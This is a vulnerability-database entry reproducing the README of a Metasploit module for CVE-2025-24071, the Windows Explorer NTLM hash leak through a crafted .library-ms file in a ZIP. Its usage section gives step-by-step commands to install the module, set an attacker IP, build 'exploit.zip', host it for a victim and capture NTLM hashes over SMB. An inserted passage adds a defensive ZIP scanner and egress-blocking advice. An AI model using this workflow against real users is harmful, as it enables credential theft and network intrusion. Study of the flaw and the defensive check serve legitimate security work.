POC details: 8c54efc3c261a903d6e4d55b17ca07110d0aa34f

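Source
Related vulnerability
Title: Microsoft Windows File Explorer information disclosure vulnerability (CVE-2025-24071)
Description: Microsoft Windows File Explorer is a file manager application from Microsoft (USA). Microsoft Windows File Explorer has an information disclosure vulnerability. An attacker can exploit this vulnerability to obtain sensitive information. The following products and versions are affected: Windows 10 Version 1809 for 32-bit Systems, Windows 10 Version 1809 for x64-based Systems, Windows Server 2019, Windows Server
Description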
metasploit module for the CVE-2025-24071
Introduction
## CVE-2025-24071: NTLM Hash Leak via .library-ms File (Metasploit Module)

This repository contains a **Metasploit module** to exploit CVE-2025-24071, a vulnerability in Windows Explorer that leaks NTLM hashes when a malicious `.library-ms` file is extracted from a ZIP archive.

Developed by: **FOLKS-IWD**

---

## **Overview**
The vulnerability is triggered when a user extracts a ZIP archive containing a specially crafted `.library-ms` file. Windows Explorer automatically initiates an SMB authentication request to a remote server specified in the file, leaking the user's NTLM hash with no further user interaction.

This Metasploit module:
1. Generates a malicious `.library-ms` file.
2. Packs it into a ZIP archive.
3. Integrates with Metasploit's SMB capture functionality to collect NTLM hashes.
![image](https://github.com/user-attachments/assets/da2a71a3-7fc9-4687-bdcf-777de4c67d9a)
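
A defender-side check for the archive pattern described above, as an added example that is not part of the original repository: it lists every `.library-ms` member of a ZIP and any UNC (`\\host\share`) reference found in it. The function names, severity labels and sample archive are assumptions constructed for illustration; the sample member bodies are placeholders, not valid library files.

```python
import io
import re
import zipfile

MAX_BYTES = 1 << 20  # read at most 1 MiB per member (guards against zip bombs)
# UNC reference of the form \\host\share, matched on raw bytes.
UNC_RE = re.compile(rb"\\\\([A-Za-z0-9._-]+)\\([^\\<>\"\s]+)")


def scan_zip(data: bytes) -> list:
    """Return one finding per .library-ms member of the ZIP held in `data`."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            if not info.filename.lower().endswith(".library-ms"):
                continue
            with zf.open(info) as fh:
                body = fh.read(MAX_BYTES)
            # Drop NUL bytes so UTF-16 encoded members match the same pattern.
            body = body.replace(b"\x00", b"")
            targets = sorted(
                {m.group(0).decode("ascii", "replace") for m in UNC_RE.finditer(body)}
            )
            findings.append({
                "member": info.filename,
                "unc_targets": targets,
                # Assumed policy: any library file in an archive gets a review,
                # one that points at a remote SMB path is rated high.
                "severity": "high" if targets else "review",
            })
    return findings


def build_sample() -> bytes:
    """Constructed test archive; bodies are placeholders, not valid library XML."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("docs/notes.library-ms", b"<x>\\\\192.0.2.10\\shared</x>")
        zf.writestr("wide.LIBRARY-MS", "\\\\files.example\\docs".encode("utf-16-le"))
        zf.writestr("local.library-ms", b"<x>C:\\Users\\Public</x>")
        zf.writestr("readme.txt", b"see \\\\192.0.2.10\\shared")
    return buf.getvalue()


if __name__ == "__main__":
    for finding in scan_zip(build_sample()):
        print(finding)
```

The same check can run at a mail or web gateway before an archive reaches a user; blocking outbound SMB (TCP 445) at the perimeter covers the case where an archive is extracted anyway.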


---

## **Installation**
1. Clone the repository:
   ```bash
   git clone https://github.com/FOLKS-IWD/CVE-2025-24071-msfvenom.git
   cd CVE-2025-24071-msfvenom
   ```
2. Copy the module to your Metasploit modules directory:
   ```bash
   cp ntlm_hash_leak.rb ~/.msf4/modules/auxiliary/server/
   ```
## **Usage**
1. Load the module:
   ```bash
   use auxiliary/server/ntlm_hash_leak
   ```
2. Set the required options:
   ```bash
   set ATTACKER_IP 192.168.1.162  # Replace with your IP address
   set FILENAME exploit.zip       # Name of the malicious ZIP file
   set LIBRARY_NAME malicious.library-ms  # Name of the .library-ms file
   set SHARE_NAME shared          # SMB share name
   ```
3. Run the module:
   ```bash
   run
   ```
4. The module will generate a malicious ZIP file (exploit.zip). Host this file for the victim to download and extract.
5. Use Metasploit's SMB capture module to collect NTLM hashes:
   ```bash
   use auxiliary/server/capture/smb
   set SRVHOST 192.168.1.162  # Same as ATTACKER_IP
   run
   ```
File snapshot

```
[4.0K] /data/pocs/8c54efc3c261a903d6e4d55b17ca07110d0aa34f
├── [2.9K] ntlm_hash_leak.rb
└── [1.9K] README.md

0 directories, 2 files
```